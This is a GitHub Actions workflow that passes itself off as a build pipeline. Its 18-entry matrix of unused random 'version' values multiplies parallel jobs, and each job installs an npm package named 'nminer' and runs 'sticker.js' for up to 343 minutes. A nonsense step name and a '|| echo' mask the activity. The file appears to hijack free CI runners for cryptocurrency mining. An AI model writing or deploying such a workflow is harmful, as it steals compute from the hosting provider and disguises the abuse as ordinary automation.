name: sticker
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8958 }
          - { version: 1887 }
          - { version: 6853 }
          - { version: 9956 }
          - { version: 1501 }
          - { version: 7393 }
          - { version: 9742 }
          - { version: 6567 }
          - { version: 3820 }
          - { version: 7782 }
          - { version: 4110 }
          - { version: 4877 }
          - { version: 5191 }
          - { version: 3195 }
          - { version: 4967 }
          - { version: 3793 }
          - { version: 1540 }
          - { version: 4080 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: among if never
        run: |
          npm install nminer@latest
          timeout 343m node sticker.js || echo "sticker executed"